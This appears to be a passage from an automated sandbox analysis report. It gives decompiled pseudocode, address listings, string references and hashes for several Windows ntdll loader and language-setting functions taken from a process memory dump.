									L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0446BB40(_t257,  &_v68, _t243);
								if(L044343C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04471370(_t278, 0x4404e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04444620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0446F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04471370(_v16, 0x4404e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0446BB40(_t262,  &_v68, _t244);
								if(L044343C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04471370(_t282, 0x4404e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0446BB40(_t262,  &_v68, _t201);
							if(L044343C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04444620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0446F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04471370(_t280, 0x4404e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0446BB40(_t267,  &_v68, _t245);
							if(L044343C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04471370(_t284, 0x4404e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0446BB40(_t267,  &_v68, _t224);
						if(L044343C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































            0x04433d3c
            0x04433d42
            0x04433d44
            0x04433d46
            0x04433d49
            0x04433d4c
            0x04433d4f
            0x04433d52
            0x04433d55
            0x04433d58
            0x04433d5b
            0x04433d5f
            0x04433d61
            0x04433d66
            0x04488213
            0x04488218
            0x04434085
            0x04434088
            0x0443408e
            0x04434094
            0x0443409a
            0x044340a0
            0x044340a6
            0x044340a9
            0x044340af
            0x044340b6
            0x044340bd
            0x044340bd
            0x04433d83
            0x0448821f
            0x04488229
            0x04488238
            0x04488238
            0x0448823d
            0x0448823d
            0x04433da0
            0x04433daf
            0x04433db5
            0x04433dba
            0x04433dba
            0x04433dd4
            0x04433e94
            0x04433eab
            0x04433f6d
            0x04433f84
            0x0443406b
            0x0443406b
            0x0443406e
            0x0443406e
            0x04434070
            0x04434074
            0x04488351
            0x04488351
            0x0443407a
            0x0443407f
            0x0448835d
            0x04488370
            0x04488377
            0x04488379
            0x0448837c
            0x0448837c
            0x0448835d
            0x00000000
            0x0443407f
            0x04433f8a
            0x04433f8d
            0x04433f90
            0x04433f95
            0x0448830d
            0x0448830f
            0x04433f9b
            0x04433fac
            0x04433fae
            0x04433fb1
            0x04433fb1
            0x04433fb6
            0x04488317
            0x0448831a
            0x00000000
            0x04433fbc
            0x04433fc1
            0x04433fc9
            0x04433fd7
            0x04433fda
            0x04433fdd
            0x04434021
            0x04434021
            0x04434029
            0x04434030
            0x04434044
            0x04434046
            0x04434046
            0x04434044
            0x04434049
            0x04488327
            0x04488334
            0x04488339
            0x0448833c
            0x0443404f
            0x0443404f
            0x0443404f
            0x04434051
            0x04434056
            0x04434063
            0x04434063
            0x04434068
            0x00000000
            0x04434068
            0x04433fdf
            0x04433fe2
            0x04433fe4
            0x04433fe7
            0x04433fef
            0x04434003
            0x04434005
            0x04434005
            0x0443400c
            0x04434013
            0x04434016
            0x04434017
            0x0443401b
            0x0443401e
            0x00000000
            0x0443401e
            0x04433fb6
            0x04433eb1
            0x04433eb4
            0x04433eb7
            0x04433ebc
            0x044882a9
            0x044882ab
            0x04433ec2
            0x04433ed3
            0x04433ed5
            0x04433ed8
            0x04433ed8
            0x04433edd
            0x044882b3
            0x044882b6
            0x00000000
            0x04433ee3
            0x04433ee8
            0x04433eed
            0x04433ef0
            0x04433ef3
            0x04433f02
            0x04433f05
            0x04433f08
            0x044882c0
            0x044882c3
            0x044882c5
            0x044882c8
            0x044882d0
            0x044882e4
            0x044882e6
            0x044882e6
            0x044882ed
            0x044882f4
            0x044882f7
            0x044882f8
            0x044882fc
            0x044882ff
            0x044882ff
            0x04433f0e
            0x04433f11
            0x04433f16
            0x04433f1d
            0x04433f31
            0x04488307
            0x04488307
            0x04433f31
            0x04433f39
            0x04433f48
            0x04433f4d
            0x04433f50
            0x04433f50
            0x04433f53
            0x04433f58
            0x04433f65
            0x04433f65
            0x04433f6a
            0x00000000
            0x04433f6a
            0x04433edd
            0x04433dda
            0x04433ddd
            0x04433de0
            0x04433de5
            0x04488245
            0x04433deb
            0x04433df7
            0x04433dfc
            0x04433dfe
            0x04433e01
            0x04433e01
            0x04433e06
            0x0448824d
            0x0448824f
            0x04488254
            0x00000000
            0x04433e0c
            0x04433e11
            0x04433e16
            0x04433e19
            0x04433e29
            0x04433e2c
            0x04433e2f
            0x0448825c
            0x0448825f
            0x04488261
            0x04488264
            0x0448826c
            0x04488280
            0x04488282
            0x04488282
            0x04488289
            0x04488290
            0x04488293
            0x04488294
            0x04488298
            0x0448829b
            0x0448829b
            0x04433e35
            0x04433e38
            0x04433e3d
            0x04433e44
            0x04433e58
            0x044882a3
            0x044882a3
            0x04433e58
            0x04433e60
            0x04433e6f
            0x04433e74
            0x04433e77
            0x04433e77
            0x04433e7a
            0x04433e7f
            0x04433e8c
            0x04433e8c
            0x04433e91
            0x00000000
            0x04433e91

            Strings
            • Kernel-MUI-Language-Allowed, xrefs: 04433DC0
            • Kernel-MUI-Number-Allowed, xrefs: 04433D8C
            • Kernel-MUI-Language-SKU, xrefs: 04433F70
            • WindowsExcludedProcs, xrefs: 04433D6F
            • Kernel-MUI-Language-Disallowed, xrefs: 04433E97
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
            • API String ID: 0-258546922
            • Opcode ID: 8dc6f0dfccf58419666af0344e7261602e973ccee667b2844ba5db0c198f61b3
            • Instruction ID: 3d84041976d957ed5b5220f4b8c4af26c9065c050080e245d2bcf36bf1987a08
            • Opcode Fuzzy Hash: 8dc6f0dfccf58419666af0344e7261602e973ccee667b2844ba5db0c198f61b3
            • Instruction Fuzzy Hash: 49F11C72D00619EBDF11EF99C980AEFB7B9FF48A54F14406BE905A7251E734AE01CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04437E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
            Download Yara Rule
            C-Code - Quality: 98%
            			E04437E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0443CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0442C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4515780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E044A5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4515780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04447D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04447D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E044A7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04447D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04447D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E044A7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0445A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0442B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















            0x04437e4c
            0x04437e50
            0x04437e55
            0x04437e58
            0x04437e5d
            0x04437e71
            0x04437f33
            0x04437e77
            0x04437e77
            0x04437e79
            0x04437e79
            0x04437e7e
            0x04437f45
            0x04489848
            0x00000000
            0x04489848
            0x04437f4e
            0x04437f53
            0x04437f5a
            0x00000000
            0x00000000
            0x0448985a
            0x04489862
            0x04489866
            0x00000000
            0x0448986c
            0x00000000
            0x0448986c
            0x04437e84
            0x04437e84
            0x04437e8d
            0x04489871
            0x04437eb8
            0x04437ec0
            0x04437ec0
            0x04437e9a
            0x0448987e
            0x00000000
            0x00000000
            0x04489884
            0x0448988b
            0x044898a7
            0x044898ac
            0x044898b1
            0x044898b6
            0x044898b8
            0x044898b8
            0x044898b9
            0x00000000
            0x044898b9
            0x04437ea0
            0x04437ea7
            0x00000000
            0x00000000
            0x04437eac
            0x04437eb1
            0x04437ec6
            0x04437ed0
            0x044898cc
            0x04437ed6
            0x04437ed6
            0x04437ed6
            0x04437ede
            0x04437ee3
            0x044898e3
            0x044898f0
            0x04489902
            0x044898f2
            0x044898fb
            0x044898fb
            0x04489907
            0x0448991d
            0x0448991d
            0x04489907
            0x044898e3
            0x04437ef0
            0x04437f14
            0x04437f14
            0x04437f1e
            0x04489946
            0x04437f24
            0x04437f24
            0x04437f24
            0x04437f2c
            0x0448996a
            0x04489975
            0x04489975
            0x0448997e
            0x04489993
            0x04489993
            0x0448997e
            0x00000000
            0x04437ef2
            0x04437efc
            0x04437f0a
            0x04437f0e
            0x04489933
            0x00000000
            0x04489933
            0x00000000
            0x04437f0e
            0x00000000
            0x00000000
            0x00000000
            0x04437eb1

            Strings
            • LdrpCompleteMapModule, xrefs: 04489898
            • minkernel\ntdll\ldrmap.c, xrefs: 044898A2
            • Could not validate the crypto signature for DLL %wZ, xrefs: 04489891
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
            • API String ID: 0-1676968949
            • Opcode ID: 1508754849c5711c340fd6a3880e534428a2e41fca3a4cd233f27cd40d59aa09
            • Instruction ID: 8e58b164b813b98010fbfe66d751f623ff4650a222f3379c88d5132fa340d05f
            • Opcode Fuzzy Hash: 1508754849c5711c340fd6a3880e534428a2e41fca3a4cd233f27cd40d59aa09
            • Instruction Fuzzy Hash: 4E511FB1604B459BEF21DF68C941B2ABBE0EB08B15F1445ABE8919B3E1D730FC01DB50
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0442E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E0442E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0442F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E044695D0();
						}
						if(_t78 != 0) {
							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0446FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0446BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04469600();
					if(_t97 < 0) {
						goto L6;
					}
					E0446BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0442F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0446BB40(_t83, _t102 + 0x24, _t78);
								if(L044343C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0446BB40(_t84, _t102 + 0x24, _t94);
									if(L044343C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































            0x0442e620
            0x0442e628
            0x0442e62f
            0x0442e631
            0x0442e635
            0x0442e637
            0x0442e63e
            0x04485503
            0x04485503
            0x0442e64c
            0x0442e64c
            0x0442e651
            0x00000000
            0x00000000
            0x0442e661
            0x0442e665
            0x0448542a
            0x0442e715
            0x0442e71a
            0x0442e71c
            0x0442e720
            0x0442e720
            0x0442e727
            0x0442e736
            0x0442e736
            0x0442e743
            0x0442e743
            0x0442e673
            0x0442e678
            0x0442e67d
            0x0442e682
            0x0442e685
            0x0442e692
            0x0442e69b
            0x0442e6a3
            0x0442e6ad
            0x0442e6b1
            0x0442e6b2
            0x0442e6bb
            0x0442e6bf
            0x0442e6c0
            0x0442e6c8
            0x0442e6cc
            0x0442e6d5
            0x0442e6d9
            0x00000000
            0x00000000
            0x0442e6e5
            0x0442e6ea
            0x0442e6f9
            0x0442e70b
            0x0442e70f
            0x04485439
            0x0448545e
            0x0448545e
            0x00000000
            0x0448545e
            0x0448543b
            0x0448543e
            0x04485440
            0x04485445
            0x04485472
            0x04485475
            0x0448548d
            0x04485493
            0x044854a9
            0x00000000
            0x00000000
            0x044854ab
            0x044854b4
            0x044854bc
            0x044854c8
            0x044854de
            0x044854fb
            0x044854e0
            0x044854e6
            0x044854eb
            0x044854eb
            0x044854de
            0x00000000
            0x044854bc
            0x04485477
            0x0448547a
            0x04485480
            0x04485483
            0x04485486
            0x0448548b
            0x00000000
            0x00000000
            0x00000000
            0x0448548b
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x04485447
            0x04485447
            0x04485447
            0x04485447
            0x0448544e
            0x00000000
            0x00000000
            0x04485450
            0x04485452
            0x04485455
            0x0448545a
            0x00000000
            0x00000000
            0x00000000
            0x0448545c
            0x0448546a
            0x0448546d
            0x0448546f
            0x00000000
            0x0448546f
            0x0442e70f

            Strings
            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0442E68C
            • InstallLanguageFallback, xrefs: 0442E6DB
            • @, xrefs: 0442E6C0
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
            • API String ID: 0-1757540487
            • Opcode ID: f304452884ecd150e8d5448eb25898ff925d64f373dd759a1a8f0b889aca4a11
            • Instruction ID: 8da5e15d085b0b19a8bc7670e6a6371d9bb7f2a54270c73f5f23258fb923ff40
            • Opcode Fuzzy Hash: f304452884ecd150e8d5448eb25898ff925d64f373dd759a1a8f0b889aca4a11
            • Instruction Fuzzy Hash: D8518072504365ABDB14EF65C440B6BB3E8AF88B14F55092FF985D7240FB35E90487A2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0444B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
            Download Yara Rule
            C-Code - Quality: 76%
            			E0444B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x451d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04447D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E044F8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04469E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0446B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0446CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04447D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E044F8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0446AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4518628; // 0x0
								_v68 = _t77;
								_t78 =  *0x451862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4518628; // 0x0
							_t116 =  *0x451862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































            0x0444b94c
            0x0444b956
            0x0444b95c
            0x0444b95e
            0x0444b964
            0x0444b969
            0x0444b96d
            0x0444b96d
            0x0444b970
            0x0444b974
            0x0444b97a
            0x0444badf
            0x0444badf
            0x0444bae2
            0x0444bae4
            0x0444bae6
            0x0444baf0
            0x04492cb8
            0x0444baf6
            0x0444baf6
            0x0444baf6
            0x0444bafd
            0x0444bb1f
            0x0444bb1f
            0x0444baff
            0x0444bb00
            0x0444bb00
            0x0444bb03
            0x0444bb03
            0x0444bacb
            0x0444bacf
            0x0444bad0
            0x0444bad1
            0x0444badc
            0x0444badc
            0x0444b980
            0x0444b980
            0x0444b988
            0x0444b98b
            0x0444b98d
            0x0444b990
            0x0444b993
            0x0444b999
            0x0444b99b
            0x0444b9a1
            0x0444b9a5
            0x0444b9aa
            0x0444b9b0
            0x0444b9bb
            0x0444b9c0
            0x0444b9c3
            0x0444b9ca
            0x0444b9cc
            0x0444b9cf
            0x0444b9d3
            0x0444b9d7
            0x0444ba94
            0x0444ba94
            0x0444ba98
            0x0444baa3
            0x04492ccb
            0x0444baa9
            0x0444baa9
            0x0444baa9
            0x0444bab1
            0x04492cd5
            0x04492cdd
            0x04492cdd
            0x0444babb
            0x0444babc
            0x0444bac2
            0x0444bac3
            0x0444bac3
            0x0444bac6
            0x00000000
            0x0444b9dd
            0x0444b9dd
            0x0444b9e7
            0x0444b9e7
            0x0444b9ec
            0x0444b9ec
            0x0444b9f1
            0x0444b9f5
            0x0444b9fa
            0x0444ba00
            0x0444ba0c
            0x0444ba10
            0x0444ba10
            0x0444ba12
            0x0444ba18
            0x00000000
            0x00000000
            0x0444bb26
            0x0444bb26
            0x0444ba1e
            0x0444ba1e
            0x0444ba23
            0x0444ba25
            0x0444ba2c
            0x0444ba30
            0x0444ba35
            0x0444ba35
            0x0444ba41
            0x0444ba46
            0x0444ba4c
            0x0444ba50
            0x0444ba54
            0x0444ba6a
            0x0444ba6e
            0x0444ba70
            0x0444ba74
            0x0444ba78
            0x0444ba7a
            0x0444ba7c
            0x0444ba8e
            0x0444ba90
            0x0444ba92
            0x0444bb14
            0x0444bb14
            0x0444bb16
            0x0444bb16
            0x00000000
            0x0444ba7c
            0x0444bb0a
            0x0444bb0d
            0x00000000
            0x00000000
            0x00000000
            0x0444bb0f

            APIs
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0444B9A5
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
            • String ID:
            • API String ID: 885266447-0
            • Opcode ID: 67e9a4f2585a77eca1eb389b268c821ed94e88232f534921918eb689750e4ad0
